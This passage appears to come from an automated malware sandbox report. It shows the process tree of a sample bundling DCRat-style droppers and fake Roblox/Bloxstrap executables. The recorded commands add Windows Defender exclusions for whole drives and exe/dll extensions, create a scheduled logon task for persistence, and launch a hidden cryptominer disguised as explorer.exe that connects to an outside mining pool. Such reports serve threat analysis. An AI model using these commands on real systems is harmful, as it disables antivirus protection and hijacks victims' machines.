C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents\My Videos\csrss.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\eHome\wininit.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\fr-FR\conhost.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\msiexec.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\dwm.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\sddsfsdf.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vMNJbUnSbM.bat"10⤵PID:2136
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:211⤵PID:2164
-
-
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"11⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
PID:1668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\spoolsv.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\conhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\es-ES\cmd.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\WmiPrvSE.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\sddsfsdf.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Idle.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\ReadyBoot\explorer.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DnAvjBEOV3.bat"12⤵PID:2664
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:213⤵PID:2952
-
-
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"13⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: GetForegroundWindowSpam
PID:1544
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"4⤵PID:2884
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "5⤵
- Loads dropped DLL
PID:2452 -
C:\winNet\ComContainerbrowserRefRuntime.exe"C:\winNet/ComContainerbrowserRefRuntime.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9uqqWUlzO4.bat"7⤵PID:1648
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2476
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:2316
-
-
C:\winNet\wscript.exe"C:\winNet\wscript.exe"8⤵
- Executes dropped EXE
PID:1708 -
C:\winNet\wscript.exe.exe"C:\winNet\wscript.exe.exe"9⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1820 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\A9jUK9Ae8C.bat"10⤵PID:2856
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:2516
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- Runs ping.exe
PID:1256
-
-
C:\winNet\wscript.exe.exe"C:\winNet\wscript.exe.exe"11⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:1708
-
-
-
-
C:\Users\Admin\AppData\Local\csrss.exe"C:\Users\Admin\AppData\Local\csrss.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:1860
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"3⤵
- Executes dropped EXE
PID:1504 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵PID:3044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"5⤵PID:2180
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"6⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"5⤵
- Loads dropped DLL
PID:2392 -
C:\Users\Admin\Bloxstrap.exeC:\Users\Admin\Bloxstrap.exe6⤵
- Executes dropped EXE
PID:1764 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"7⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2520 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit8⤵PID:2656
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1688
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
- Executes dropped EXE
PID:2332 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵PID:2900
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth8⤵PID:2388
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Frage build.exe"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"4⤵PID:820
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "5⤵
- Loads dropped DLL
PID:1632 -
C:\DriversavessessionDlldhcp\Roblox.exe"C:\DriversavessessionDlldhcp/Roblox.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:560 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4np3pl54\4np3pl54.cmdline"7⤵PID:2156
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D5A.tmp" "c:\winNet\CSCA4C2121C24C74BF895E5B3D597394777.TMP"8⤵PID:2168
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mbi1aa25\mbi1aa25.cmdline"7⤵
- Drops file in Program Files directory
PID:1820 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DE7.tmp" "c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP"8⤵PID:2116
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcqkwtqq\lcqkwtqq.cmdline"7⤵PID:1852
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E54.tmp" "c:\Users\All Users\CSC95C42A624314BE78310BDEB9D835BA3.TMP"8⤵PID:1668
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1ppnnp\mr1ppnnp.cmdline"7⤵
- Drops file in Windows directory
PID:2972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F1F.tmp" "c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP"8⤵PID:2520
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfzenaag\cfzenaag.cmdline"7⤵PID:824
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F6D.tmp" "c:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\CSC67F9D5D440504062ACE553C19FFDE5E4.TMP"8⤵PID:2596
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsormrob\bsormrob.cmdline"7⤵PID:2380
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8028.tmp" "c:\winNet\CSC49D7F72528124E81B41D936BF212C46B.TMP"8⤵PID:1460
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gjjieqlg\gjjieqlg.cmdline"7⤵PID:1680
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8095.tmp" "c:\winNet\CSC97D079D2907144CEAE72F4F99686E3.TMP"8⤵PID:2396
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ho3etse\3ho3etse.cmdline"7⤵PID:1256
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8102.tmp" "c:\winNet\CSC3992B8FD69D44AFFAB9FE267318D8677.TMP"8⤵PID:2012
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iuv4z3u2\iuv4z3u2.cmdline"7⤵PID:968
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES816F.tmp" "c:\Users\Admin\Documents\My Videos\CSC228DE5B123194A0D88E81292314E68A3.TMP"8⤵PID:2572
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\isip5dhu\isip5dhu.cmdline"7⤵PID:1360
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81CD.tmp" "c:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\CSCDD2E6DCB555746B4A413D5CFB027D2AA.TMP"8⤵PID:1128
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4bqf3ev\g4bqf3ev.cmdline"7⤵
- Drops file in Program Files directory
PID:2052 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8259.tmp" "c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP"8⤵PID:2372
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\24qxckip\24qxckip.cmdline"7⤵
- Drops file in Windows directory
PID:1868 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82D6.tmp" "c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP"8⤵PID:568
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tggocznb\tggocznb.cmdline"7⤵PID:2604
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8353.tmp" "c:\Users\All Users\Microsoft\eHome\CSC1ACF99C1ED05466F84E5BBE09011CE69.TMP"8⤵PID:820
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nb1h5mye\nb1h5mye.cmdline"7⤵PID:2096
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D0.tmp" "c:\MSOCache\All Users\CSC12ACF0B35F3F40B39BFE2C5B4089659.TMP"8⤵PID:1100
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dimtaqxu\dimtaqxu.cmdline"7⤵PID:1324
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES845C.tmp" "c:\DriversavessessionDlldhcp\CSCDB0D1EC529DA4CC8A5904E3928B049D7.TMP"8⤵PID:316
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tec2jh3k\tec2jh3k.cmdline"7⤵PID:2168
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D9.tmp" "c:\winNet\CSC50F968E876B4431CAAFB7131F4B618AD.TMP"8⤵PID:2252
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu1aq3rt\hu1aq3rt.cmdline"7⤵
- Drops file in System32 directory
PID:944 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8527.tmp" "c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP"8⤵PID:1468
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\csrss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NNPPtxWawv.bat"7⤵PID:2232
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2144
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:2608
-
-
C:\Users\Admin\AppData\Local\csrss.exe"C:\Users\Admin\AppData\Local\csrss.exe"8⤵
- Executes dropped EXE
PID:1768
-
-
-
-
-
-
-
-
